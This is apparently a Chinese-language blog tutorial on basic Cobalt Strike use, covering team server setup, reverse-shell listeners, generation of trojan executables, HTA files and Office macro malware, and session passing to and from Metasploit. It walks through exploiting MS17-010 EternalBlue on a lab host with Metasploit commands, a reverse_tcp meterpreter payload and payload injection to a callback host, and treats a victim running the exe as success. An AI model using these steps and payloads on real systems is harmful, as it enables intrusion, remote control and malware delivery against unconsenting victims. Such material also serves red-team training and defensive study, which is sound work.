?Cobalt Strike基礎使用
Cobalt Strike分為客戶端組件和服務器組件,服務器的組件也是團隊服務器,可以放在局域網或者公網下進行團隊使用,也是Cobalt Strike社會工程功能的托管機器,團隊服務器還可以存儲由Cobalt Strike收集的數據,并且進行日志管理。
Cobalt Strike服務器必須在Linux系統上運行,這里演示服務器在Linux KALI端,本地進行Cobalt Strike客戶端的連接。

CobaltStrike集成了端口轉發、服務掃描,自動化溢出,多模式端口監聽,windows exe 木馬生成,windows dll 木馬生成,java 木馬生成,office 宏病毒生成,木馬捆綁。釣魚攻擊包。
CS使用
啟動CS服務端


啟動客戶端
服務端啟動后客戶端啟動進行連接(團隊多人連接將用戶名設置為自己的用來區分團隊成員)

主界面

CS功能使用(主機上線)
1.設置監聽器用來接收會話

name:監聽器名字
payload:payload類型
Host: shell反彈的主機,kali IP
Port: 反彈端口

這里Payload有9種選項,如下:
內部的Listener
windows/beacon_dns/reverse_dns_txt
windows/beacon_dns/reverse_http
windows/beacon_http/reverse_http
windows/beacon_https/reverse_https
windows/beacon_smb/bind_pipe
外部的Listener
windows/foreign/reverse_dns_txt
windows/foreign/reverse_http
windows/foreign/reverse_https
windows/foreign/reverse_tcp
Beacon為內置的監聽器,在目標主機執行相應的payload,獲取shell到cs上;其中包含DNS、HTTP、HTTPS等,Beacon可以選擇通過DNS還是HTTP/S協議出口網絡,甚至可以在使用Beacon通訊過程中切換HTTP和DNS。其支持多主機連接,部署好Beacon后提交一個要連回的域名或主機的列表,Beacon將通過這些主機輪詢。目標網絡的防護團隊必須攔截所有的列表中的主機才可中斷和其網絡的通訊。通過種種方式獲取shell以后(比如直接運行生成的exe),就可以使用Beacon了。
Foreign為外部結合的Listener,經常用于MSF的結合,例如獲取meterpreter到MSF上。
2.生成木馬
HTML Application 生成惡意的HTA木馬文件;
MS Office Macro 生成office宏病毒文件;
Payload Generator 生成各種語言版本的payload;
Windows Executable 生成可執行exe木馬;
Windows Executable(S) 生成無狀態的可執行exe木馬


生成后會保存到指定地方,通過某種方式上傳到對方機器上,可以通過Webshell方式等這里不在講解了
受害者運行exe文件我們的CS就直接上線了

這是生成exe文件,還可以生成宏病毒等上面介紹到的。
3.正常我們進去需要調整響應的時間,sleep 3 就行。


可以對我們上線的機器進行以下操作,也可以聯動MSF進行使用

聯動MSF使用
將MSF的會話轉發到CS上
通過漏洞復現演示MSF獲取目標Session
KALI:192.168.50.218
CS:192.168.50.130
受害者IP:192.168.50.185
1.發現漏洞
Nmap -A掃描目標開放了445端口

通過使用MSF輔助模塊掃描發現存在ms17_010漏洞
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.50.185
exploit

查找漏洞利用模塊

漏洞利用
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set RHOST 192.168.50.185
Run

獲取后 我們background獲取session

與CS聯動,將會話轉發到CS中
CS配置新建一個監聽

KALI中配置
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost 192.168.50.218 //KALI IP
set lport 4443 與CS同端口
set session 1

CS這邊就接收到了MSF的會話

CS的會話轉發到MSF中
由于生成的木馬就是HTTP的,所以委派給msf時,監聽器還是HTTP的
CS添加一個監聽器

MSF準備
Use exploit/multi/handler
Set payload windows/meterpreter/reverse_http
Set lhost ip
Set lport ip

設置完成后我們就可以使用CS進行委派會話了

選中我們剛剛創建的就行

這樣我們的MSF端就會獲取到這個會話
CS還有非常多的功能,大家慢慢發現